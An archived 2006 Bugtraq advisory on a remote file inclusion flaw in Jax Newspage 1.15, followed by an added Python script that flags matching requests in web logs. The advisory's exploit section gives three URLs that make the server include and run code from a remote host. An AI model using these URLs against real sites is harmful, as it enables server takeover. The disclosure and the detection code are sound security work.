Open Source and information security mailing list archives
Date: 13 Oct 2006 01:00:51 -0000
From: dj_remix_20@...mail.com
To: bugtraq@...urityfocus.com
Subject: Jax Newspage Remote File include

# BiyoSecurity.Org & SecurityWall.Org
# Download : http://www.jtr.de/scripting/php/newspage/newspage%20v1.15.zip
# Script Name : jax newspage
# Version : 1.15
# Risk : high
# Regard : RMx
# Thanx : Liz0zim , KorsaN , DreamLord , TR_IP

# Vulnerable Files :
/admin/index.php
/admin/news.admin.php
/newsarchive.php

# Vulnerable code :
// Global variables
require ( $path_to_script."globals.inc.php");

# Exploit :
http://www.victim.com/[PATH]/newsarchive.php?path_to_script=http://site.com/cmd.gif?&cmd=ls
http://www.victim.com/[PATH]/admin/index.php?path_to_script=http://site.com/cmd.gif?&cmd=ls
http://www.victim.com/[PATH]/admin/news.admin.php?path_to_script=http://site.com/cmd.gif?&cmd=ls
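
A detection sketch for the requests described in the advisory, added here as an example and not part of the original post: it scans web-server access-log lines for the `path_to_script` parameter on the three listed files. The log format (common/combined), the sample lines, the function names and the verdict labels are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# File names and parameter taken from the advisory text.
VULNERABLE_FILES = ("/admin/index.php", "/admin/news.admin.php", "/newsarchive.php")
PARAM = "path_to_script"

# Request line of a common/combined log format entry (assumed format).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Value begins with a URL-style wrapper such as http://, ftp://, php:// or data:
SCHEME_RE = re.compile(r"^\s*(?:[a-z][a-z0-9+.-]+://|data:)", re.IGNORECASE)

def classify(log_line):
    """Return None, 'local-override' or 'remote-include' for one log line.

    Assumption: the script is meant to set this variable itself, so any
    request-supplied value is flagged; a URL-style value is flagged higher.
    """
    m = REQUEST_RE.search(log_line)
    if not m:
        return None
    target = urlsplit(m.group(1))
    if not target.path.lower().endswith(VULNERABLE_FILES):
        return None
    # parse_qs percent-decodes, so http%3A%2F%2F is compared as http://
    values = parse_qs(target.query, keep_blank_values=True).get(PARAM)
    if values is None:
        return None
    if any(SCHEME_RE.match(v) for v in values):
        return "remote-include"
    return "local-override"

def scan(lines):
    """Return (line_number, verdict) for every flagged line, 1-indexed."""
    hits = []
    for number, line in enumerate(lines, start=1):
        verdict = classify(line)
        if verdict:
            hits.append((number, verdict))
    return hits

# Constructed sample log lines (documentation addresses and example hosts).
SAMPLE_LOG = [
    '192.0.2.10 - - [13/Oct/2006:01:10:00 +0000] "GET /news/newsarchive.php?path_to_script=http://example.org/x.gif?&cmd=ls HTTP/1.0" 200 512',
    '192.0.2.11 - - [13/Oct/2006:01:11:00 +0000] "GET /news/admin/index.php?path_to_script=hTTp%3A%2F%2Fexample.org%2Fx.gif%3F HTTP/1.1" 200 512',
    '192.0.2.12 - - [13/Oct/2006:01:12:00 +0000] "GET /news/admin/news.admin.php?path_to_script=../ HTTP/1.1" 500 0',
    '192.0.2.13 - - [13/Oct/2006:01:13:00 +0000] "GET /news/newsarchive.php?page=2 HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    for number, verdict in scan(SAMPLE_LOG):
        print(number, verdict)
```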